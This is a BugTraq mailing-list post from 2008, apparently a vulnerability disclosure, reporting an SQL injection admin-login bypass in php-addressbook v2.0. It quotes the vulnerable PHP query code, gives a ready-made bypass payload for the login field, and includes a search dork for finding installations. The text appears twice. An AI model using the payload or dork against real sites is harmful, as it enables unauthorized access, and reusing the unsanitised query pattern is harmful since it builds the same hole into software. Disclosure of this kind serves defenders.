Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Vista
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Focus On: Vista
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
BugTraq
Back to list
|
Post reply
php-addressbook v2.0 SQL Injection Vulnerbility
Mar 26 2008 10:11AM
hadihadi_zedehal_2006 yahoo com
########################################################################
# #
# php-addressbook v2.0 SQL Injection Vulnerbility #
# [admin Authentication bypass] #
########################################################################
Virangar Security Team
www.virangar.org
www.virangar.net
--------
Discoverd By : hadihadi
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all iranian hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)
-----------------------------------
dork: © php-addressbook v2.0
-----------------------------------
vuln code in index.php:
line 26:$username = $_POST['username'];
ine 27:$password = $_POST['password'];
and line 28:
$sql = "SELECT * FROM $usertable WHERE username='$username' AND password=PASSWORD('$password')";
-----------------------
vuln:
login:admin ' or 1=1/*
password:[blank]
-------------------------------------
tnx: all hackerz
[ reply ]
Privacy Statement
Copyright 2007, SecurityFocus
# #
# php-addressbook v2.0 SQL Injection Vulnerbility #
# [admin Authentication bypass] #
########################################################################
Virangar Security Team
www.virangar.org
www.virangar.net
--------
Discoverd By : hadihadi
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all iranian hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)
-----------------------------------
dork: © php-addressbook v2.0
-----------------------------------
vuln code in index.php:
line 26:$username = $_POST['username'];
ine 27:$password = $_POST['password'];
and line 28:
$sql = "SELECT * FROM $usertable WHERE username='$username' AND password=PASSWORD('$password')";
-----------------------
vuln:
login:admin ' or 1=1/*
password:[blank]
-------------------------------------
tnx: all hackerz
[ reply ]